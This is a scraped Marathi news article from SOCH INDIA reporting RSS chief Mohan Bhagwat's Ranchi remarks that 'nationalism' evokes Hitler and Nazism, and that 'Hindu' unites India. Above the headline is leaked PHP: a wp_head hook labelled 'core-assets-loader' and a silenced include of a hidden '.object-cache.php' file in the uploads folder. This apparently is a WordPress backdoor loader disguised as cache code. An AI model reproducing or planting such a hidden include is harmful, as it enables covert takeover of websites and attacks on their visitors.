add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); ‘या’मध्ये हिटलरची प्रतिमा झळकते; सरसंघचालकांचे मोठे वक्तव्य – SOCH INDIA
Menu

देश
‘या’मध्ये हिटलरची प्रतिमा झळकते; सरसंघचालकांचे मोठे वक्तव्य

nobanner

राष्ट्रीय स्वयंसेवक संघाचे सरसंघचालक मोहन भागवत यांनी राष्ट्रीयत्वाच्या मुद्यावर मोठं विधान केलं आहे. ‘राष्ट्रवाद’ या सारख्या शब्दांमधून नाझी व हिटलरची प्रतिमा झळकते. झारखंडची राजधानी रांची येथे आयोजित एका कार्यक्रमात ते बोलत होते. यावेळी त्यांनी ‘आरएसएस’चा विस्तार देशासाठी आहे कारण, आमचे उद्दिष्ट भारताला विश्वगुरू बनवण्याचे आहे, असं देखील सांगितलं.

सरसंघचालक भागवत म्हणाले, राष्ट्रवाद या सारख्या शब्दांचा वापर करायला नको, कारण याचा अर्थ नाझी किंवा हिटलरशी जोडला जाऊ शकतो. अशावेळी राष्ट्र किंवा राष्ट्रीय या सारख्या शब्दांचा प्रामुख्याने वापर करायला हवा. यावेळी त्यांना सांगितले, जगासमोर सध्या आयएसआयएस, कट्टरपंथी आणि हवामान बदलासारखी मोठी आव्हानं आहेत. विकसित राष्ट्र काय करतात, ते आपला व्यापार वाढवण्यासाठी प्रत्येक देशात स्वतःच जाळ विस्तारू इच्छित आहेत. ज्या आधारे ते आपल्या अटी मान्य करून घेऊ इच्छित आहेत.

जगासमोर ज्या काही समस्या आहेत, त्यांच्यापासून केवळ भारतच मुक्तता देऊ शकतो. भारताला जगाचे नेतृत्व करण्याचा विचार करायला हवा. देशाची एकता हीच खरी ताकद आहे, याचा आधार वेगळा असू शकतो, मात्र उद्देश एकच आहे, असंही सरसंघचालक यावेळी म्हणाले.

हिंदुत्वाच्या मुद्यावर देखील त्यांनी भाष्य केलं. सरसंघचालकांनी सांगितलं, ‘हिंदू’ असा एक शब्द आहे जो भारताला जगासमोर योग्यरित्या सादर करू शकतो. देशात भलेही कितीही धर्म असतील, मात्र प्रत्येक व्यक्ती एकाच शब्दाने जुडलेला आहे, तो म्हणजे हिंदू. हा शब्द देशाची संस्कृती जगाला दाखवतो. संघ देशातील विस्ताराबरोबरच हिंदुत्वाच्या अजेंड्यावर पुढे जात राहणार आहे, जो देशाला जोडण्याचे काम करेल.